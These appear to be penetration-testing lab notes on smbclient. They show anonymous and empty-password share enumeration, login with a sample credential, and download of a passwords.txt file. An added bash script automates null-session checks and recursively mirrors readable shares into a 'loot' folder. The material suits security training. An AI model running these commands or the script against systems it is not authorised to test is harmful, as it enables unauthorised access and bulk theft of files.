SMBCLIENT
INSTALLATION
root@oco:~$ sudo apt install smbclient
LISTING SHARES: PASSWORD MISCONFIGURATION
#test whether the server has accounts with an empty password
root@oco:~$ smbclient -h
root@oco:~$ smbclient -L //targetIP -U userName
* the -L flag lists the shares available on the target
* the -U flag specifies the login identity; smbclient then prompts for the password
- press Enter at the prompt to try an empty password, or pass it inline as -U userName% (empty string after the %)
* a common misconfiguration is a privileged account (e.g. administrator) left with an empty password
- a successful login with an empty password may also be the server falling back to a guest/anonymous session, so compare with a -N run before concluding the account itself has no password
LISTING SHARES: W/O PASSWORD
root@oco:~$ smbclient -h
root@oco:~$ smbclient -N -L \\\\10.129.42.253

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        users           Disk
        IPC$            IPC       IPC Service (gs-svcscan server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
* the -N flag (null session) is used for anonymous access
- it suppresses the password prompt and sends an empty password instead
- flag order does not matter: smbclient -L 10.129.42.253 -N behaves the same
* the -L flag lists the shares available on the target
* IPC$ (the named-pipe share) is always present; print$ (printer drivers) comes from the stock Samba smb.conf on Debian/Ubuntu, so both show up on most default installs
ACCESSING SHARES: W/ CREDENTIALS
root@oco:~$ smbclient //10.129.150.91/users -U bob%Welcome1
Try "help" to get a list of possible commands.
* smbclient needs a share path, like //IP/SHARE
- without a share name it does not know what to connect to, so list the shares with -L first if the name is not already known
* -U user%password passes the password inline, so no prompt appears
- -U bob alone prompts: Enter WORKGROUP\bob's password:
- pressing Enter at that prompt sends an empty password; on a share that permits guest access the server answers "Anonymous login successful"
- an inline password ends up in the shell history and is visible in the process list (ps) on the attacking box
* backslashes can be used instead of forward slashes, but they must be escaped for the shell
- \\\\10.129.150.91\\users -U bob%Welcome1
- //10.129.150.91//users (doubled slash before the share name) is wrong; the share follows a single slash
smb: \> ls
  .                                   D        0  Thu Feb 25 16:42:23 2021
  ..                                  D        0  Thu Feb 25 15:05:31 2021
  bob                                 D        0  Thu Feb 25 16:42:23 2021

                4062912 blocks of size 1024. 1332480 blocks available
smb: \> cd bob
smb: \bob\> ls
  .                                   D        0  Thu Feb 25 16:42:23 2021
  ..                                  D        0  Thu Feb 25 16:42:23 2021
  passwords.txt                       N      156  Thu Feb 25 16:42:23 2021

                4062912 blocks of size 1024. 1332480 blocks available
smb: \bob\> get passwords.txt
getting file \bob\passwords.txt of size 156 as passwords.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \bob\> exit
root@oco:~$ cat passwords.txt
...
* in the listing D marks a directory and N a normal file
* get writes the file into the local working directory (change it with lcd)
CONNECTION W/O PASSWORD
root@oco:~$ smbclient //10.129.202.5/sambashare
Password for [WORKGROUP\htb-ac-53539]:
Try "help" to get a list of possible commands.
smb: \>
* after listing the shares, test whether each one can be opened without credentials
- with no -U, smbclient uses the local username (here htb-ac-53539) and prompts; pressing Enter sends an empty password
- this only works if the server allows guest/anonymous access to the share or is otherwise misconfigured; -N skips the prompt and sends the empty password directly
DOWNLOADING FILES
get <file> copies a file from the share into the local working directory; commands prefixed with ! run on the local system (non-target side) without leaving the session
smb: \> get prep-prod.txt
getting file \prep-prod.txt of size 71 as prep-prod.txt (8,7 KiloBytes/sec)
(average 8,7 KiloBytes/sec)
smb: \> !ls
prep-prod.txt
smb: \> !cat prep-prod.txt
[] check your code with the templates
[] run code-assessment.py
[] …
* the "!" followed by a cmd can be used to execute local system commands (non-target side)
- this will not interrupt the connection.
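The steps above (list shares with -N -L, test each share with a null session, pull files with get) are the same every time, so they are worth scripting. The script below is an added example and not part of the original notes: it wraps the manual commands in shell functions driven non-interactively through smbclient's -c option, parses the -L listing into share names, and mirrors readable shares with mget. The SMB_TARGET and DUMP environment variables are names chosen here, and SAMPLE_LISTING is a constructed copy of a -N -L listing; everything else is standard smbclient syntax.

```shell
#!/usr/bin/env bash
# Added example, not part of the original notes: the manual steps above
# (smbclient -N -L to list shares, smbclient -N //IP/share to test access,
# get/mget to download) wrapped in functions driven non-interactively via -c.
# Assumptions: smbclient is on PATH; SMB_TARGET/DUMP are variable names chosen
# here; SAMPLE_LISTING is a constructed copy of a `-N -L` listing.
set -u

# Extract Disk-type share names from `smbclient -L` output read on stdin.
# The header, the dashed separator, IPC$ (type IPC) and the trailing
# "SMB1 disabled" notice all have something other than "Disk" in column 2,
# so they drop out. Share names containing spaces are not handled.
parse_disk_shares() {
    awk '$2 == "Disk" { print $1 }'
}

# List Disk shares on a target using a null session (one name per line).
list_disk_shares() {
    smbclient -N -L "//$1" 2>/dev/null | parse_disk_shares
}

# Exit 0 if the share can be opened and listed with a null session.
# -c runs the quoted smbclient commands and exits, so nothing prompts.
share_readable() {
    smbclient -N "//$1/$2" -c 'ls' >/dev/null 2>&1
}

# Test the empty-password misconfiguration: -U 'user%' supplies an explicit
# empty password. A 0 exit can also mean the server fell back to a guest
# session, so compare with the -N result before concluding the account has
# no password.
empty_password_works() {
    smbclient -L "//$1" -U "$2%" >/dev/null 2>&1
}

# Mirror a whole share into ./loot/<target>/<share>. "recurse ON" makes mget
# descend into subdirectories; "prompt OFF" disables the per-file y/n question.
dump_share() {
    local dest="loot/$1/$2"
    mkdir -p "$dest"
    (cd "$dest" && smbclient -N "//$1/$2" -c 'recurse ON; prompt OFF; mget *')
}

# Walk every Disk share: report which ones a null session can read and,
# when dump=yes, mirror the readable ones.
audit_null_session() {
    local target="$1" dump="${2:-no}" share
    list_disk_shares "$target" | while IFS= read -r share; do
        if share_readable "$target" "$share"; then
            echo "[+] //$target/$share readable without credentials"
            [ "$dump" = yes ] && dump_share "$target" "$share"
        else
            echo "[-] //$target/$share denied"
        fi
    done
}

# Constructed sample of `smbclient -N -L` output (same shape as the listing above).
SAMPLE_LISTING='
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        users           Disk
        IPC$            IPC       IPC Service (gs-svcscan server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available'

# Only touch the network when a target is given, e.g.
#   SMB_TARGET=10.129.42.253 ./smb_null_audit.sh            # report only
#   SMB_TARGET=10.129.42.253 DUMP=yes ./smb_null_audit.sh   # also mirror
if [ -n "${SMB_TARGET:-}" ]; then
    audit_null_session "$SMB_TARGET" "${DUMP:-no}"
else
    echo "Disk shares in the constructed sample listing:"
    printf '%s\n' "$SAMPLE_LISTING" | parse_disk_shares
fi
```

Run without SMB_TARGET it only parses the embedded sample (print$ and users come out, IPC$ does not). With SMB_TARGET set it performs the listing, tests each Disk share with a null session and, with DUMP=yes, mirrors the readable ones under ./loot, which is the scripted equivalent of the interactive get used above.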
EXECUTING LOCAL SYSTEM CMDS
!<cmd> in smbclient runs a command in the local shell without leaving the interactive prompt.
It executes on the attacking system, not on the SMB server, which saves time when manipulating local files (listing directories, moving downloaded loot) while staying inside the smbclient session.
//list local files while connected to the target
smb: \> !ls
notes.txt exploit.c loot/